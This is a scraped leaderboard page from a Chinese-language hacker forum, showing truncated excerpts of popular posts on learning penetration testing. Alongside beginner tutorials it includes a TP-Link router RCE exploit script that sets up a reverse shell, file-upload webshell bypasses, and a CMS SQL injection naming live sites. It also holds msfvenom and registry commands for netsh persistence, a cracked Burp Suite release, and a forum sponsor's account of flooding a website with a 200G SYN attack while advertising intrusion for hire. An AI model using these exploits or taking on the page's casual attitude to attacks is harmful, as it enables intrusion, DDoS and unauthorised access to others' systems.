Jump to content
请先注册账号再浏览本站!Maak een account aan voordat u deze site bezoekt!

Leaderboard

Popular Content

Showing content with the highest reputation since 02/14/2020 in all areas

  1. 因为之前的时候论坛有给人家代挂广告,现在权限回归本站站长Wind所有。论坛本身是不含任何广告 站内不含有任何交易,论坛商城中的东西是以送的形式给大家发放的福利。站外交易自行注意,任何损失与本站无关。 前段时间网站在他人管理的情况下无法注册,现已开通注册,给大家带来的不便希望理解!网站流失2万多名用户,站长也很心痛!!! 最近在抖音、快手以及各类短视频平台看到很多与我国黑客相关的话题具体如下 在此之前我本来不想说些什么的。如今的中国已是屹立于世界的大国能与美国比肩 但 希望国人要居安思危,不要整天无脑的看那些鸡血视频 觉得我们国家的黑客很厉害很牛逼。 特别是一些短视频博主,发的一些乱七八糟的视频误导一些学生及不了解网络技术这一块的人群 像一些什么“中国黑客团队在黑帽(Black hat)连续勇夺几年冠军杯禁赛”虽然我们国家有团队拿过冠军,但这些讲解的视频也太过浮夸 什么几秒钟破解谷歌 15岁黑客封神。作为一个中国人 从古至今都是以谦为重 太过骄傲的人 往往没有什么好下场。 我们还有很多很多地方不如别人 所以我们要好好学习 努力去超过别人,而不是整天无脑的幻想 刷着短视频 觉得自己又可以了。觉得国家已经站在世界之巅了 我们不努力 往后我们这一代人 会过得越来越差! 互联网给我们带来了很多便利,近几年火起来的短视频可以让我们发现
    7 points
  2. 首先希望用户们都自觉遵守国家法律。论坛游客须知跟注册条款上的内容可以多看看,网站内部禁止虚拟交易,被骗本站概不负责。如今网络诈骗横行 能走正规平台尽量走正规平台交易,最多的就是什么网络追款、账号密码破解、定位之类的。这类被骗的几百上百分之九十九。希望大家能放亮自己的眼睛,不被眼前的病急而乱投了医。 论坛算是建立大概三个月了,之前一直没怎么管 很抱歉。琐事比较多,现今免费开放注册。论坛需要大家一起来建立、打造一个好的交流社区,不希望在网站里看到广告、或者是一些赌博网站,特别是赌博网站 运营、代理的人发出来查证后一律举报。 很喜欢看到大家在网站活跃,这段时间因为疫情影响 相信大家也憋得慌 这里可以大家加顶部的群交流聊天,在网站内部经常回答问题包括发布文章的小伙伴 等这段疫情过后站长会统计,网站后台有数据的,统计完成赠送定制的移动硬盘。谢谢大家一路以来的信任与支持,本站原则上不接任何广告、危害网络安全的活动 订单。 另外网站内有声誉功能,声誉功能是文章、回答、活动内被认可的功能。声誉也可以决定你是否能获得本站赠送的移动硬盘;本站往后也会有很多福利。例如一些靶场U盘赠送,一些学习资料 注册了 不会让你吃亏,况且网站也暂时不需要您付费注册。
    6 points
  3. 这是一篇全世界最详细的黑客中文教程文章 声明1: 学习网络技术只为维护自身或其它职责网络安全,请自己好好把握机会 不要违规操作! 声明2: 以下内容均在本地完成复现,不涉及任何非法行为,不允许使用本项目所提及的所有技术内容进行非法行为,使用技术的风险由使用者自行承担后果! 文章如下(由于这篇文章很长,所以把它分成了五个部分。点击即可查看!) 第一部分 第二部分 第三部分 第四部分 第五部分 发布者:CNHACKTEAM @font-face { font-family: 'Electrolize'; font-style: normal; font-weight: 400; src: local('Electrolize'), local('Electrolize-Regular'), url(http://themes.googleusercontent.com/static/fonts/electrolize/v2/DDy9sgU2U7S4xAwH5thnJ4bN6UDyHWBl620a-IRfuBk.woff) format('woff'); } .container
    3 points
  4. 想成为一名黑客,大学是要学信息安全专业还是网络安全专业啊,看见好多人说黑客需要自学,具体该如何自学(本人零基础)可否烦请各位高人指点,谢谢
    3 points
  5. 我是技术不高,但我能带你入门 我遇到过无数人曾来像我表示自己想学网络安全,走了很多弯路,求师被骗过很多钱。 这样的人我没办法帮助太多,限于时间精力与能力,帮得了1个帮不了100个,再说我也不是昔日的雷锋了。 如今我也基本上不做渗透了,回过头看到几年前自己笔记中有一些注入笔记,虽然我没有大牛水平,没有高端操作,但我希望我能把我仅有的一些技术与资源,能够最大程度惠及到网络安全向往者身上,能够带领一部分新人步入网络安全。 网络安全其实跟其他行业一样,网上什么教程都有,但能百度到不一定能学到,大多杂乱无章,教程更多的是表达成果,及简要的过程。供学习者来说可消化性太低。 其实对于入门者来说最重要的是:从哪开始,如何开始,需要秉持什么样的价值观,而不是天天混圈子,喊这个表哥,那个大佬。 SQL注入教程说明 本教程旨在带领理解SQL注入基本原理与实现方式,以及常见的注入操作。 学习SQL注入之前需要先学习基本的SQL语句,http基本的get与post请求,url编码。 本教程从笔记中整理修饰,可能连贯性不强,不够系统,但都是重要且需要理解的点。 建议基于Sqlilab边学习边实践 在理解本教程完后,可以学习:Sqlmap使用教程【个人笔记精华整理】 SQL手工注入入门教程
    3 points
  6. 此教程为完整的渗透测试初学教程,教程内容如下,就算你是初中文化你都能看懂!因为这个是直接从最最基础的学起的。教程内容忘记是从哪拿到的了,感谢版主。 对于零基础的我有一条建议;建议先从建站开始,这里我们推荐使用宝塔面板 傻瓜式操作,自己购买服务器域名(学生机大概一年200块钱)搭建一个属于自己的博客或者是网站;在这期间你可以不断的练习html以及PHP还有了解网站及服务器架构,对往后的学习有莫大的帮助! 一、建站(适用于零基础小白,可就业于网页设计、网页编程): 1.初步学习Html5 HTML初步了解、HTML规范、HTML结构、font_body标签、文本修饰、editplus设置、排版标记、符号和编号、 bgsound、HTML颜色、meta、IMG、路径介绍、布局、radio、Fiedset、form与服务器、map、Frameset、Frame_nime、 模板、CSS初步认识、基本选择器、组合选择器、CSS单位与字体、边框讲解、Padding_maragin、Backgroundfixed…JS等等… 2.PHP讲解 介绍http协议+挖局BUG、搭建APache+PHP+MYSQL、域名及解析讲解、PHP变量+变量引用、 数据类型+字符串函数+常量+运算符+i
    2 points
  7. 在线安全书籍网址 Web安全书籍 1 – Web Hacking 101 中文版 2 – Kali Linux Web渗透测试秘籍 中文版 3 – Kali Linux burpsuite实战指南 4 – 渗透测试Node.js应用 5 – Web安全资料和资源列表 6Kali Linux Web 渗透测试秘籍 中文版 信息安全等级保护 欺骗的艺术 HTTP权威指南 Web安全渗透剖析 Web前端黑客技术揭秘 Web应用安全威胁与防治 Web应用漏洞侦测与防御 Wi-Fi安全书籍 Kali Linux 无线渗透测试入门指南 中文版 无线网络安全攻防实战进阶 POC编写安全书籍 PoC 编写指南 PHP代码审计安全书籍 PHP代码
    2 points
  8. 全世界唯一一篇最详细的渗透测试中文文章 新手可根据自身情况模拟渗透测试,本地渗透测试环境搭建论坛也有说。希望大家好好学习 为维护网络安全贡献自身的一份力量,下面的教程非常非常详细 可能是你这辈子看过最长的技术文章哈哈哈,但你认真看,就会发现收获很多 域名历史IP https://x.thrXXXbook.cn/ 网站架构/服务器指纹/CMS识别/容器 Whatweb 网页源代码 请求头/响应头 网站底部,顶部,左上角右上角 网站报错信息 http://www.yunsee.cn/ 域名/install Firefox插件Wappalyzer CMS漏洞 定位版本对应已知漏洞检查 CMS未知漏洞挖掘 Web容器已知漏洞(解析漏洞这种) 显示网站使用的技术 https://builtwith.com/ 中间件、组件 Weblogic、tomcat、zabbix、struts、axis等 https://github.com/FortyNorthSecurity/EyeWitness 子域名 老站、同样架构或同源码的子站 爆破,接口查询 https://phpinfo.me/domain/ https://d.chinacycc.com/index.php?m=Login&am
    2 points
  9. 常见校验上传文件方法 客户端校验 通过javascript来校验上传文件的后缀是否合法,可以采用白名单,也可以采用黑名单的方式 判断方式:在浏览加载文件,但还未点击上传按钮时便弹出对话框,内容如:只允许上传.jpg/.jpeg/.png后缀名的文件,而此时并没有发送数据包。 绕过 直接修改js代码或者使用抓包的方法修改请求内容绕过,可以先上传一个gif木马,通过抓包修改为 jsp/php/asp,只用这种方法来检测是肯定可以绕过的 服务端校验 1.校验请求头 content-type字段 if($_FILES['userfile']['type'] != "image/gif"){ .... } 绕过 通过抓包来修改Http头的content-type即可绕过,也肯定是可以绕过这种检测 2.文件头白名单的检测 常见的文件头(文件头标志位)如下 (1).JPEG;.JPE;.JPG,”JPGGraphicFile”(FFD8FFFE00) (2).gif,”GIF89A”(474946383961) (3).zip,”ZipCompressed”(504B0304) (4).doc;.xls;.xlt;.ppt;.apr,”MSCompoundDocume
    2 points
  10. 模拟用户行为点击指的是模拟用户进行关键词搜索浏览访问点击等动作,目前各大搜索引擎都有相关的算法,该类手法在行业里也叫做快排,快排形容模拟点击是很不准确的。 模拟点击的发展: 四年前模拟点击开始登上SEO的舞台,当时很简单,只要你有一个模拟点击的脚本和一个动态拨号VPS,一天拿着你的网站刷刷刷就可以把网站顶到第一名,后面被滥用,百度2017年11月20号推出惊雷算法。 模拟点击的手法一直活到了现在,就是因为模拟用户行为这个操作,百度无法完全识别,到底谁是真的,谁是刷的,百度只能出算法,从多个维度去逐一分别,当研究该类算法的SEO经过大量的测试之后,摸清百度的算法规则漏洞,就开始大批量的复制,这也是导致目前整个SEO市场混乱的原因,每一家提供SEO服务的公司,都会自己研发或者代理某一厂家的模拟点击,OEM贴牌之后,全国百花齐放,每个人都说自己是厂家,但是真能靠模拟用户点击能刷上去的站,很少。前几天突起一个靠模拟点击上seo词首页的公司,叫seo大本营,有兴趣的可以百度看一下。 模拟点击的一个分支,叫发包,很多人可能都听过,但是发包这个东西神秘到极致,既没有访问记录,也没一个给你看到的过程,怎么就能把网站排名刷上去呢,其实发包和大家抓包是一样,发包抓的是百度的包,然后直接修改百度的用户记录参数,经过破解参数和大量的实验,做到一个非常棒
    2 points
  11. 黑客技术和语言有关,又和语言无关,不执著于语言,在于认识安全问题的本质。 问题的前提不准确,学黑客都说先学C++,那些搞系统安全的人,学习汇编/C/C++才更加重要。 假如你是搞web安全的 ,那么你可能首先要学习的语言是html,javascript,php,jsp等,其实黑客将每种语言都学习的特别精通不现实,我们要挖掘的是安全问题,不是纠结于语言本身,等你一开始将一门语言学习的特别精通,可能已经离初心越来越远的,但是如果有时间能精通当然是最好的。 如果你是要做系统安全或者二进制安全,需要对操作系统的原理有较深的理解,推荐你学习汇编或者C (C++包含了一部分C) ,当语言越初级,代表着他和操作系统的关系更紧密,更容易学习到系统的运行机制。
    2 points
  12. 前言Preface: 小飞是一名网络技术爱好者;今天他打开电脑浏览网页在一个源码网站上发现了一个注入点 Xiao fei is a web technology enthusiast; Today he opened his computer to browse the web and found an injection point on a source site 本以为丢给sqlmap就可以了,结果sqlmap只显示确实是注入点,但是数据库却获取不了。这时他突然可以使用手工进行注入... I thought I'd just throw it to the sqlmap, but the sqlmap only shows that it's really the injection point, but the database can't get it. Then suddenly he could inject it by hand... 点击此处进入游戏(Click here to enter the game) 提交
    2 points
  13. 1、肉鸡: 所谓“肉鸡”是一种很形象的比喻,比喻那些可以随意被我们控制的电脑,对方可以是WINDOWS系统,也可以是UNIX/LINUX系统,可以是普通的个人电脑,也可以是大型的服务器,我们可以象操作自己的电脑那样来操作它们,而不被对方所发觉。 2、木马: 就是那些表面上伪装成了正常的程序,但是当这些被程序运行时,就会获取系统的整个控制权限。有很多黑客就是 热中与使用木马程序来控制别人的电脑,比如灰鸽子,黑洞,PcShare等等。 3.网页木马:表面上伪装成普通的网页文件或是将而已的代码直接插入到正常的网页文件中,当有人访问时,网页木马就会利用对方系统或者浏览器的漏洞自动将配置好的木马的服务端下载到访问者的电脑上来自动执行。 4、挂马: 就是在别人的网站文件里面放入网页木马或者是将代码潜入到对方正常的网页文件里,以使浏览者中马。 5、后门: 这是一种形象的比喻,入侵者在利用某些方法成功的控制了目标主机后,可以在对方的系统中植入特定的程序,或者是修改某些设置。这些改动表面上是很难被察觉的,但是入侵者却可以使用相应的程序或者方法来轻易的与这台电脑建立连接,重新控制这台电脑,就好象是入侵者偷偷的配了一把主人房间的要是,可以随时进出而不被主人发现一样。 通常大多数的特洛伊木马(T
    2 points
  14. 大家好,我是论坛服务器的赞助商,我们做渗透测试及安保业务。我的QQ是 75960992 今天给大家带来一个故事,白嫖怪的QQ是115**281 看着是挺厉害的,做人不行。 起因:被金融诈骗公司诈骗了钱 他说是五十万 实际上我不知道是多少钱。 于是他说已经公安部立案,但进展不快。希望我们做一下 说是被骗了,希望我们能先做后付款。好的 我们演示能力给她看。 后面回到团队叫小伙伴一起找漏洞 发现三个漏洞 分别 注入XSS 另外就是后台登录的时候抓包可以直接跳过 不过里面权限不太够 需要提权操作。 这白嫖怪说的是让他停一周,去协商就行 于是我们用了简单的DD SYN 发出200G 直接就炸了。 下面看我操作图片 网站黑洞中的时候,他说需要面交,本来拒绝的,后面看到那么真诚 想帮他一把。他买票过来了 后面想着 他这种狗急跳墙的人应该不会善罢甘休。 没想到真的。这种狗急跳墙的人很容易出事,没让他来,他就说我不能做什么的。 后面自然是谈崩了,这种人真的没必要,说漏洞 说渗透 我叫人也做了,说干站 也干了,非得要提出这些无理的要求。我一毛钱没收到,还非得好像给了我几百万一
    1 point
  15. MySQL 是世界上最流行的关系型数据库管理系统,在 WEB 应用方面 MySQL 是最好的 RDBMS(Relational Database Management System:关系数据库管理系统)应用软件之一。全球很多著名公司和站点都使用Mysql作为其数据库支撑,并且很多架构都以Mysql作为数据库管理系统,例如LAMP、和WAMP等,在针对网站渗透中,很多都是跟Mysql数据库有关,各种Mysql注入,利用Mysql来getshell、Mysql提权,等等。本文,笔者我对Mysql在渗透测试中的常见的基础利用进行了详细的总结,包括利用MySQL获取webshell、MySQL提权以及几个MySQL的0day漏洞等。 MySQL相关信息收集 不管是你渗透什么玩意儿,信息收集都是首要的一步。在行动之前,我们需要搞清楚,目标主机上是否存在MySQL、MySQL运行在默认的端口还是指定的端口、MySQL的版本信息、MySQL用户信息等等。 Mysql默认端口是3306端口,但也有自定义端口,针对默认端口扫描主要利用扫描软件进行探测。我们可以用nmap等端口扫描工具对MySQL的端口进行扫描。 如果已经获得了目标MySQL的密码,我们可以使用该用户名和密码扫描获取指定IP地址的端口信息以及mysql数据库相关信息:
    1 point
  16. 此漏洞已有团队在贩卖,为了断了他们财路,本人决定放出此漏洞原理。 文章底部有视频教程,图文教程如果看不懂,就直接跳到底部看视频。 0x01 思路很简单,首先下载一个雷电模拟器。 0x02 下载完成之后在下载一个YY语音和CE在模拟器中安装好。 0x03 打开YY语音进入自己频道(注:自己必须是OW的频道),进入之后设置成自由麦模式。 0x04 然后打开模拟器里面的CE修改器,选择YY进程。(YY进程名:com.duowan.mobile) 0x05 然后通过CE搜索你自己频道的ID,如果在子频道就搜索子频道的ID(查看频道ID的方法可以通过飞机票看到) 0x06 搜索完之后在搜索结果里面会出现很多结果,不要着急不要慌,我们在次打开模拟器里面的YY,在频道里面切换一下子频道,然后在搜索新的子频道ID。你就会发现结果变成了十多个,各别的就几个,当然这个结果越少越好。 0x07 找到搜索结果里面和你子频道ID匹配的数值,然后把他添加到地址列表,然后在地址列表里面修改成目标频道的ID(注:没修改完之前模拟器里面的YY
    1 point
  17. BurpSuite2021.2.1更新日志 BurpSuite2021.2.1发布于2021年2月16日 build5962 cracked 此版本提供了多个Burp Suite更新频道,包括Early Adopter频道。它还提供了改进的Intruder有效负载列表和一些错误修复。 多个更新渠道 现在,我们通过两个渠道向Burp Suite提供自动更新:稳定版和早期采用者。所有用户的默认频道为“稳定”。新版本的Burp Suite将首先出现在Early Adopter频道上,然后在解决任何初始问题后转到稳定频道。更新通道设置是针对每个安装的,因此可以将多个安装设置为不同的更新通道。 选择早期采用者频道以快速获取最新功能。选择稳定通道以获得Burp Suite最强大和最可靠的版本。 要更改您的更新频道,请转到“用户选项”,然后选择“其他”标签。然后向下滚动到“更新”并选择您喜欢的频道。 改进入侵者(Intruder)默认有效载荷列表 我们改进并扩展了Intruder的默认有效负载列表。还有一些新列表,例如SSRF有效负载以及通用文件和目录。 Bug修复 此版本还提供了一些错误修复,例如: 如果自定义User-Agent值包含冒号,则可以正确保存。 在
    1 point
  18. 想了解一下docker的故事。
    1 point
  19. http://www.thehackerplaybook.com/Windows_Domain.htm,虽说里面有 例如把win2012作为例子,但还是不放心..
    1 point
  20. 声明 所有数据均来自且仅来自公开信息,未加入个人先验知识,如有疑义,请及时联系。 公开这批数据是为了大家一起更快更好地学习,请不要滥用这批数据,由此引发的问题,本人将概不负责。 Why 最初目的:个人日常安全阅读资源不足,需要从博客、Github、Twitter等多个数据源补充。 延续目的:以人为核心,系统化收集博客、Github、当前主要研究方向、所属安全组织、学校、公司、RSS、知乎、微博、Email等信息,缩小安全圈的范围。 信息检索:通过关键字检索,方便找人,缩小人与人之间的交流障碍。比如通过高校关键字,可以快速找到校友,通过网络ID快速找到博主。 内容学习:例如从主要研究方向入手,Follow不同方向活跃博主,补充阅读资源,紧追安全前沿。 数据分析:挖掘人与人之间的社交网络,判断自己当前所处位置,指引未来发展方向。 What 数据采集 此版本数据为采集到的公开数据,数据格式为: Fol
    1 point
  21. VPS是虚拟云服务器,VPN是网络代理。
    1 point
  22. 由于我之前写了不少网络安全技术相关的故事文章,不少读者朋友知道我是从事网络安全相关的工作,于是经常有人在微信里问我: 我刚入门网络安全,该怎么学?要学哪些东西?有哪些方向?怎么选? 不同于Java、C/C++等后端开发岗位有非常明晰的学习路线,网路安全更多是靠自己摸索,要学的东西又杂又多,难成体系。 常读我文章的朋友知道,我的文章基本以故事为载体的技术输出为主,很少去谈到职场、面试这些方面的内容。主要是考虑到现在大家的压力已经很大,节奏很快,公众号上是让大家放松的地方,尽量写一些轻快的内容。不过随着越来越多的人问我上面这些问题,今天就专门写一篇来摆一摆这个龙门阵。 近几年,随着网络安全被列为国家安全战略的一部分,这个曾经细分的领域发展提速了不少,除了一些传统安全厂商以外,一些互联网大厂也都纷纷加码了在这一块的投入,随之而来的吸引了越来越多的新鲜血液不断涌入。 网络安全分支 其实在网络安全这个概念之上,还有一个更大的概念:信息安全。本文不去探讨二者在学术划分上的区别,如无特殊说明,文中将其视为一个概念,我们来看下实际工作方向上,有哪些细分路线。 在这个圈子技术门类中,工作岗位主要有以下三个方向:
    1 point
  23. 不知道怎么学习路线,自己在网络逛了一个月没一点头绪。渗透挂链初级就行。大佬求指教
    1 point
  24. (渗透测试、APP逆向破解 合法等保操作等可以加Qq合作 75960992) 0X00 前言 团队A师傅发来个站,问我有没有得搞 正好在搞其他的站,卡住了,开干换个思路。 0x01 信息收集 开burp抓了下包,目标设置了url重写,开了报错,我们随意输入一个控制器就直接报错。 获取到web绝对路径。 抓包发现这样的请求 随手试了一下burpsuite的dnslog,发现请求过去并回显了,猜测后端使用file_get_contens来获取。 一个可回显ssrf,有什么用呢? 打内网? 尝试file协议,尝试读取文件,发现可以读。 但发现返回的内容不完整,猜测有截断,用php://filter协议base64编码一下绕过读取。 解码 有一个任意文件读取有什么用呢? 在这之前,其实是有用nmap扫了一下其他端口 开了挺多端口的,一个个测了一下发现999端口开着phpmy
    1 point
  25. 导语:黑客不断使用和改进DDoS攻击来破坏特定服务、大小型企业甚至公共和非营利组织的工作。 想象一下有人使用不同的电话号码一遍又一遍地打电话给你,而你也无法将他们列入黑名单。最终你可能会选择关闭手机,从而避免骚扰。这个场景就是常见的分布式拒绝服务(DDoS)攻击的样子。 乔布斯(Steve Jobs)推出第一款iPhone之前,DDoS攻击就已经存在了。它们非常受黑客欢迎,因为它们非常有效,易于启动,并且几乎不会留下痕迹。那么如何防御DDoS攻击呢?你能否确保对你的web服务器和应用程序提供高级别的DDoS攻击防护?在本文中,我们将讨论如何防止DDoS攻击,并将介绍一些特定的DDoS保护和预防技术。 DDoS攻击的类型和方法 分布式拒绝服务攻击(简称DDoS)是一种协同攻击,旨在使受害者的资源无法使用。它可以由一个黑客组织协同行动,也可以借助连接到互联网的多个受破坏设备来执行。这些在攻击者控制下的设备通常称为僵尸网络。 有多种执行DDoS攻击的工具:例如Trinoo,Stacheldraht,Shaft,Knight,Mstream等。这些工具的可用性是DDoS攻击如此广泛和流行的原因之一。 DDoS攻击可以持续数百小时 DDoS攻击可能持续几分钟、几小时、甚至是几天。卡巴斯基实验室的
    1 point
  26. 我不懂是不是渗透类的,我想找个大神帮我进入黑彩平台修改余额,可以帮我吗?我已经走投无路了
    1 point
  27. ping攻击对网站起不了多大的作用,现在这种攻击已经用不了了。你说的应该是如何防范DDOS,防范DDOS攻击我们可以先从CDN以及升级网站服务器防御开始。如果想更好的保护网站的话,可以把网站发一下 看到后再教你怎么做。
    1 point
  28. 渗透测试,DDOS 可以用于测试自己的网站。别做违规的事情。
    1 point
  29. 版本 Ladon >= 7.1 139端口 NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows”文件和打印机共享”和SAMBA。 IPC$通信 Windows系统中的net use ipc$整个通信过程,先445->137->139验证,当你开启防火墙禁用445,发现系统命令就无法连接IPC了,根本没机会走到139,所以使用系统自带命令连接的ipc$需要同时开启这些端口。说入侵139就是IPC$的说法是错误的,就像说wmiexec.vbs可完全替代PSEXEC工具一样,这个脚本需要目标开启135和445,因为它通过445来传输结果,意味着目标只开放135这个VBS的回显就没有了,其实假设目标只开放445,这个VBS脚本还能执行命令吗?哪来的替代或扔掉?这个系统的IPC$连接也是同理,测试首先得把其它端口禁了再说话。虽然系统自带命令需要同时开启,但是 自己实现SMB服务器的话是可以只使用139或只用445端口的,详情参考impacket。 Nbt爆破 系统自带命令需要同时开启139和445,但是 自己实现SMB服务器的话是可
    1 point
  30. #!/usr/bin/python3 import sys import hashlib import base64 import requests import binascii import socket """ RCE via stack-based overflow on TP-Link WDR4300 (N750) devices, using CVE-2017-13772. Tested on Firmware versions 3.13.33, Build 130618 and 3.14.3 Build 150518, hardware WDR4300 v1 Usage: 1) Start listener on attacker machine: nc -nlvvp 31337 2) Execute script: python exploit.py <attacker_ip> """ def main(argv): if len(sys.argv) < 2: print("Usage: python exploit.py <attacker_ip>") sys.exit(1) password = "admin" target = "192.168
    1 point
  31. # Exploit Title: SpamTitan 7.07 - Remote Code Execution (Authenticated) # Date: 2020-09-18 # Exploit Author: Felipe Molina (@felmoltor) # Vendor Homepage: https://www.titanhq.com/spamtitan/spamtitangateway/ # Software Link: https://www.titanhq.com/signup/?product_type=spamtitangateway # Version: 7.07 # Tested on: FreeBSD # CVE : CVE-2020-11699, CVE-2020-11700, CVE-2020-11803, CVE-2020-11804 ---[SPUK-2020-09/SpamTitan 7.07 Multiple Authenticated Remote Code Execution]------------------------------ SECURITY ADVISORY: SPUK-2020-09/SpamTitan 7.07 Multiple Authenticated Remote Code Execution Af
    1 point
  32. 有没有想过黑客如何能远程入侵您的智能手机? 在今天与《黑客新闻》共享的一份报告中,Check Point研究人员披露了有关 Instagram Android应用程序中一个关键漏洞的详细信息,该 漏洞可能允许远程攻击者仅通过向受害者发送特制图像即可控制目标设备。 更令人担忧的是,该漏洞不仅使攻击者可以在Instagram应用程序中代表用户执行操作(包括监视受害者的私人消息,甚至从其帐户中删除或发布照片),而且还可以在设备上执行任意代码。 根据 Facebook发布的 咨询报告,堆溢出安全问题(跟踪为CVE-2020-1895,CVSS得分:7.8)影响128.0.0.26.128之前的Instagram应用程序的所有版本,该版本于2月10日早些时候发布年。 Check Point Research在今天发表的一份分析报告中说:“这一缺陷使该设备成为了一种工具,可以在他们不知道的情况下监视目标用户,并可以恶意操纵其Instagram个人资料。” “无论哪种情况,这种攻击都可能导致用户隐私的大规模入侵,并可能影响声誉-或导致更为严重的安全风险。” 在将调查结果报告给Facebook之后,这家社交媒体公司通过六个月前发布的补丁程序更新解决了该问题。公开披
    1 point
  33. 发布内容作者:metasploit 漏洞危害等级:〔严重〕 <font style="vertical-align: inherit;"><font style="vertical-align: inherit;">##</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;"> #此模块需要Metasploit:https://metasploit.com/download</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;"> #当前来源:https://github.com/rapid7/metasploit-framework</font></font><font>
    1 point
  34. 概述:跨站脚本攻击(Cross-Site Scripting)为了避免与CSS(层叠样式表)撞名,故称为XSS。当出现此类漏洞时,攻击者可以将恶意脚本注入到其他无害的网站上,再在用户的浏览器上执行这类脚本程序。 XSS攻击通常分为两类:存储型XXS漏洞和反射型XSS漏洞。存储型攻击代码存储于被攻击服务器,在用户访问攻击脚本所在的页面,攻击脚本就自动加载。用户论坛,评论和用户可以保存输入信息并显示给其他用户的地方,是理想的攻击场所。而反射型XSS漏洞的攻击脚本并不位于目标的服务器上,攻击人员必须引诱用户单击一个去往目标网站的恶意连接来实施攻击,比如将在链接后面构造语句,但是这样的语句很奇怪,可是如果他缩短了呢?你还看的出来吗?如果服务器直接引用输入结果也会触发这种攻击(例如:错误消息或搜索结果) 反射型XSS攻击不能脱离恶意构造而单独存在,所以他也是一种社会工程学攻击。我们可以制作一个url,让url的部分内容成为真正的网站,而且可以是目标人员知道并信任的网站,然后再通过XSS攻击技术进行攻击(例如:用户重定向到恶意界面)。XSS攻击只能发生在对用户输入检查不恰当的地方! 尝试:手工检测反射型xss漏洞,比如就像百度,如果你搜索的时候他后面直接将你的搜索信息显示为结果的一部分,也在url处直接引用了你的搜索信息,那他
    1 point
  35. SQL注入首先会判断服务端数据库的类型,通过已知不同数据库的一些特性,便于后续进一步渗透测试 一般来说SQL注入存在的四个语句“SELECT/UPDATE/INSERT/DELETE”,增删改查,通过一些参数带入SQL执行语句中,再通过拼凑等方式获取更多的信息 0x00 常见网页类型对应数据库关系 asp : Access/SQLServer php : Mysql jsp : Oracle 0x01 如何判断Mysql数据库 其实判断数据库的类型,也是依据不同数据库中一些特性问题上处理的不同来区分。 Mysql数据库是一种非常常见的关系型数据库,被大量用于类似PHP语言的web应用当中 1.1 字符串拼接 如上图,可以拼接字符串 1.2 BENCHMARK函数 MySQL有一个内置的 BENCHMARK() 函数,可以测试某些特定操作的执行速度。 参数可以是需要执行的次数和表达式。 表达式可以是任何的标量表达式,比如返回值是标量的子查询或者函数。请注意:该函数只是简单地返回服务器执行表达式的时间,而不会涉及分析和优化的开销。 如上通过对比,发现MD5的效率SHA1效率高 在MYSQL当中字符
    1 point
  36. 某漫画cms中的SQL注入 Author:1x2Bytes 在某*站中发现多个使用该套cms的黄色漫画站,查看后台指纹发现是xhxcms,在github找到该套源码, 下载审计后发现一处报错注入 源码下载: https://github.com/hiliqi/xiaohuanxiong/ 打开后在 application/index/controller/Index.php 93 行,的 search 方法 109行中调用了 bookService类 中的 search 方法 跟进bookService的search方法,在文件 application/service/BookService.php 的198行,看具体代码 可以看到没有做任何过滤就将用户输入的参数传入,导致SQL注入 实战相关站点: public function search($keyword, $num) { return Db::query( "select * from " . $this->prefix . "book where delete_time=0 and match(book_name,summary,
    1 point
  37. 入门教程可以看www.hackedl.com 基本都是零基础教程。
    1 point
  38. 唉,刚来啥也不会。有入门教程吗?
    1 point
  39. 链接挂了能补一下吗我想保存一下,谢谢!
    1 point
  40. 如果是真的的话可能用不到你了跟他说哦,他会自己去做提现。能用的话 为什么要给你呢,换位思考一下。
    1 point
  41. 我今天遇到一个说可以利用抓包技术,说弄到另一个平台然后提现的的。但是他说要我给定金,最后才把密码给我提现,我没给就把抓包弄没了,又拉黑我了。这是真的吗
    1 point
  42. 本人在自己的阿里云中搭建了apache,但是最近有这个漏洞,表示如何利用这个漏洞(从黑客的角度) !本人小白
    1 point
  43. 您好,正常来说是不可能的,如果能进去改的话 钱也提不出来 网络上谨防被骗!能说帮你追回的都是骗人的哦~
    1 point
  44. Netsh是Windows实用程序,管理员可以使用它来执行与系统的网络配置有关的任务,并在基于主机的Windows防火墙上进行修改。可以通过使用DLL文件来扩展Netsh功能。此功能使红色团队可以使用此工具来加载任意DLL,以实现代码执行并因此实现持久性。但是,此技术的实现需要本地管理员级别的特权。 通过msfvenom生成一个dll msfvenom -p widnows/x64/exec CMD=calc.exe -f dll > test.dll 在受害机执行 netsh add helper <DLL_PATH> 之后netsh一运行就会加载DLL(加载完DLL后自动运行netsh,关闭之后。再此之后执行的netsh都会加载dll) 如果要实现启动系统自动运行netsh,得修改注册表 reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Windows\SysWOW64\netsh"; reg setval -k HKLM\\software\\microsoft\\windows\\currentversi
    1 point
  45. 网络安全学习路线是什么呀?各位大佬
    1 point
  46. 【1】HTML,css,js三个算是一套课程。 【2】PHP 【3】kali Linux工具的使用和数据库! 【4】网络安全的原理 剩下的看你的选择了。到时候就算转变安全方向也可以慢慢学了!但是我感觉你是要web安全 ,所以弄得这个顺序!我感觉先简单学一学用工具会更有动力! 其实前两个不一定 要学,但是有一定帮助,比如你在学习前两个中你会了解如何搭建网站,什么是数据库!环境的搭建,见到常见的端口啦! 而所谓的一句话木马很多也是PHP!所以可以不精通,但是必须懂! 如果软件安全的话,可以先去学破解软件! 无线安全的话,前两个看一下就行,然后多看看无线方面的的书籍!多看书,看视频!无线我是一点都没经验,但是很多博客都是有教制作钓鱼WiFi啥的! 但是你要记住的一点就是,社会工程学是必须的!不一定要专门学,是有机会就学! 当黑客就别想装逼了!要不会暴露的信息太多,随便一查就 查出来的。不要暴露QQ,微信号,手机号!任何平台都是!要不一查一个准! 密码要设置难的,但是要保证每个平台的都不一样!(记不住可以找小本子记)不重要的网站可以用临时邮箱注册!邮箱不要包涵个人信息,网上名字可以都一样,但是社交网站名字和号一定不能和你其他平台的一样!(比如你玩抖音,就不要和其他平台
    1 point

Follow: 世界中文黑客论坛由CNHACKTEAM[CHT]创建,汇集国内外技术人员,这是一群研究网安黑客攻防技术领域的专家.

法务要求丨Legal丨закон丨القانون

请在学习期间遵守所在国家相关法律,否则后果自负!

Пожалуйста, соблюдайте законы страны, в которой вы находитесь, во время обучения, или будут последствия!

勉強期間中に該当する国の法律を守ってください。そうでなければ結果は自己責任です。

Please abide by the relevant laws of your country during your study, or you will be responsible for the consequences!

官方旗下项目丨About our project

